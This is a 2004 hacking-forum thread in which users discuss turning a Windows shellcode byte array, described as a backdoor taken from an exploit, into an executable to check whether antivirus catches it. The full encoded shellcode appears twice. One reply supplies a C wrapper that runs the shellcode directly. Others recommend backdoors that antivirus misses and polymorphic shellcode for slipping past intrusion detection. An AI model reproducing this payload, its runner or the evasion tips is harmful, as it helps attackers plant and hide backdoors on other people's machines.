karate
Feb 2 2004, 03:39 AM
when i have a shellcode like that in an exploit:
| QUOTE |
char w32shell[] =
"\x7b\xb3\xea\xf9\x92\x95\xfc\xc9\x68\x8d\x0c\x4e\x1c\x41\xdc"
"\xe0\x44\x93\x60\xb7\xb0\xb0\xa0\x98\xc7\xc3\xa2\xcf\xa3\xa2"
"\xbe\xd4\xdc\xdc\x91\x7b\x95\x78\x69\x6f\x6f\x6f\xcd\x13\x7d"
"\xba\xfa\xa0\xc9\xf4\x1b\x91\x1b\xd0\x9c\x1b\xe0\x8c\x3d\x1b"
"\xe8\x98\x1d\xcf\xac\x1b\x8b\x91\x6b\x1b\xcb\xe8\x91\x6b\x1b"
"\xdb\x8c\x91\x69\x1b\xc3\xb4\x91\x6a\xc3\xc1\xc2\x1b\xcb\xb0"
"\x91\x6b\xa1\x59\xd1\xa1\x50\x09\x1b\xa4\x1b\x91\x6e\x3c\xa1"
"\x52\x41\x72\x14\x50\xe5\x67\x9f\x26\xd5\x95\x1d\xd4\xd5\x94"
"\xf6\xa9\x80\xe5\x71\xf6\xa1\x80\xca\xc8\xce\xc6\xc0\xc2\xbb"
"\xde\x80\xd1\x9f\x27\x9c\xda\x1b\x94\x18\x91\x68\x9f\x26\xdd"
"\x95\x19\xd4\x1d\x48\x6e\xdd\x95\xe5\x2e\x6e\xdd\x94\xe4\xb1"
"\x6e\xdd\xb2\x1d\xcd\x88\xc3\x6f\x40\x19\x57\xfa\x94\xc8\x18"
"\xd5\x95\x10\xd5\xe7\x9a\x1d\xcd\xe4\x10\xfb\xb6\x84\x79\xe8"
"\x6f\x6f\x6f\x19\x5e\xa1\x4b\xc3\xc3\xc3\xc3\xc6\xd6\xc6\x6f"
"\x40\x07\xc5\xc8\xf6\x19\xa0\xfa\x80\xc5\xc7\x6f\xc5\x44\xde"
"\xc6\xc7\x6f\xc5\x5c\xc3\xc5\xc7\x6f\xc5\x40\x07\x1d\xd5\x18"
"\xc0\x6f\xc5\x74\xc5\xc5\x6f\xc5\x78\x1d\xd4\x95\x9c\x04\xc3"
"\xf8\xbe\xf5\xe8\xf5\xf8\xcc\xf3\xfd\xf4\x04\xa1\x42\x1d\xd5"
"\x5c\x04\xc7\xc7\xc7\xc3\xc3\x6e\x56\x91\x62\xc2\x04\x1d\xd5"
"\xe8\xc0\x1d\xd5\x18\xc0\x21\x98\xc3\xc3\xfa\x80\x6e\x5e\xc2"
"\xc3\xc3\xc3\xc5\x6f\xc5\x7c\xfa\x6f\x6f\xc5\x70"; |
how is it possible to compile the shellcode to binaries??
i' ve tried to paste this in dev-c++ but it doesn't worked..
i don't want to compile the exploit, just the backdoor.
thanks in advance for help!
SyN/AcK
Feb 2 2004, 09:38 AM
What would the point of that be? If all you want is a program to emulate a shell, why not just write one in C rather than using the asm? Pointless.
karate
Feb 2 2004, 10:29 AM
this is for testing the injected backdoor antivirus detection, and also stability.
FireAlwaysWorks
Feb 2 2004, 02:22 PM
I don't think of shell code as stable. I have found really small shell-code but it seems to crash some computers. It would be simple for AV's to detect it. The question is do they? Probably not. The only advantage to using shell-code as a back-door is its size and speed, but do you really care about the efficiency of a back-door? I would rather have one with kewl features like give you a shell though ICQ or to be able to control it from your cell phone
. There are plenty of simple back-doors that are not detectable by AV's like NC 2.0.
raif
Feb 2 2004, 03:07 PM
all this is true, but to answer karate's original question
| QUOTE |
| how is it possible to compile the shellcode to binaries?? |
you don't compile shellcode because it's the hex representation of asm that's already been compiled
it's machine language already
atomix
Feb 2 2004, 04:00 PM
| QUOTE (raif @ Feb 2 2004, 03:07 PM) |
all this is true, but to answer karate's original question
| QUOTE | | how is it possible to compile the shellcode to binaries?? |
you don't compile shellcode because it's the hex representation of asm that's already been compiled it's machine language already |
nicely put
vnet576
Feb 2 2004, 04:05 PM
| QUOTE (FireAlwaysWorks @ Feb 2 2004, 09:22 AM) |
| or to be able to control it from your cell phone . |
Are you serious?
karate
Feb 2 2004, 10:04 PM
i know this is hex values (asm) but i wonder if i can have a .exe from my shellcode, to see what it does and if antivirus picks it or not.
i was told realserver shellcode is detected by av. (exploit is for sure detected by kav, but i wonder for shellcode.
yuliang11
Feb 3 2004, 01:07 AM
| QUOTE |
QUOTE (FireAlwaysWorks @ Feb 2 2004, 09:22 AM)
or to be able to control it from your cell phone .
Are you serious?
|
i think it's very possible
most cellphones support aim over sms, to achieve communication with a computer like that, just sign onto an aim/aol toc server with a valid screenname and password and your ready to rock. ive written programs like this to monitor various news-related sites.
krackatoa
Feb 3 2004, 11:23 PM
http://www.metasploit.com/shellcode.htmlThey have great examples of shell code.
The source is provided which you can compile into an exe. Executing it will open the specified port. Change the source to suit your needs.
I think they provide the binaries precompiled if you're challenged
riotz
Feb 8 2004, 07:04 PM
create new file
paste code
and compile!
| CODE |
char w32shell[] =
"\x7b\xb3\xea\xf9\x92\x95\xfc\xc9\x68\x8d\x0c\x4e\x1c\x41\xdc"
"\xe0\x44\x93\x60\xb7\xb0\xb0\xa0\x98\xc7\xc3\xa2\xcf\xa3\xa2"
"\xbe\xd4\xdc\xdc\x91\x7b\x95\x78\x69\x6f\x6f\x6f\xcd\x13\x7d"
"\xba\xfa\xa0\xc9\xf4\x1b\x91\x1b\xd0\x9c\x1b\xe0\x8c\x3d\x1b"
"\xe8\x98\x1d\xcf\xac\x1b\x8b\x91\x6b\x1b\xcb\xe8\x91\x6b\x1b"
"\xdb\x8c\x91\x69\x1b\xc3\xb4\x91\x6a\xc3\xc1\xc2\x1b\xcb\xb0"
"\x91\x6b\xa1\x59\xd1\xa1\x50\x09\x1b\xa4\x1b\x91\x6e\x3c\xa1"
"\x52\x41\x72\x14\x50\xe5\x67\x9f\x26\xd5\x95\x1d\xd4\xd5\x94"
"\xf6\xa9\x80\xe5\x71\xf6\xa1\x80\xca\xc8\xce\xc6\xc0\xc2\xbb"
"\xde\x80\xd1\x9f\x27\x9c\xda\x1b\x94\x18\x91\x68\x9f\x26\xdd"
"\x95\x19\xd4\x1d\x48\x6e\xdd\x95\xe5\x2e\x6e\xdd\x94\xe4\xb1"
"\x6e\xdd\xb2\x1d\xcd\x88\xc3\x6f\x40\x19\x57\xfa\x94\xc8\x18"
"\xd5\x95\x10\xd5\xe7\x9a\x1d\xcd\xe4\x10\xfb\xb6\x84\x79\xe8"
"\x6f\x6f\x6f\x19\x5e\xa1\x4b\xc3\xc3\xc3\xc3\xc6\xd6\xc6\x6f"
"\x40\x07\xc5\xc8\xf6\x19\xa0\xfa\x80\xc5\xc7\x6f\xc5\x44\xde"
"\xc6\xc7\x6f\xc5\x5c\xc3\xc5\xc7\x6f\xc5\x40\x07\x1d\xd5\x18"
"\xc0\x6f\xc5\x74\xc5\xc5\x6f\xc5\x78\x1d\xd4\x95\x9c\x04\xc3"
"\xf8\xbe\xf5\xe8\xf5\xf8\xcc\xf3\xfd\xf4\x04\xa1\x42\x1d\xd5"
"\x5c\x04\xc7\xc7\xc7\xc3\xc3\x6e\x56\x91\x62\xc2\x04\x1d\xd5"
"\xe8\xc0\x1d\xd5\x18\xc0\x21\x98\xc3\xc3\xfa\x80\x6e\x5e\xc2"
"\xc3\xc3\xc3\xc5\x6f\xc5\x7c\xfa\x6f\x6f\xc5\x70";
int main(){
void (*funct) ();
(long) funct = &w32shell;
funct();} |
Tyrano
Feb 15 2004, 10:44 AM
| QUOTE |
| was told realserver shellcode is detected by av. (exploit is for sure detected by kav, but i wonder for shellcode. |
not sure what you mean but many IDS can detect the NOP sled so sometimes polymorphic shellcode is necessary to hide what you are doing
studnikov
Feb 16 2004, 11:39 AM
so what do you use to Decompile it back to readable code ?
D3ADLiN3
Feb 16 2004, 03:19 PM
whats the best way to get shell code?
DaClueless
Mar 5 2004, 07:54 AM
| QUOTE (Tyrano @ Feb 15 2004, 10:44 AM) |
| QUOTE | | was told realserver shellcode is detected by av. (exploit is for sure detected by kav, but i wonder for shellcode. |
not sure what you mean but many IDS can detect the NOP sled so sometimes polymorphic shellcode is necessary to hide what you are doing |
Some Anti-Virus program scan for Attack packect in the .exe, so that what most likely happen.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
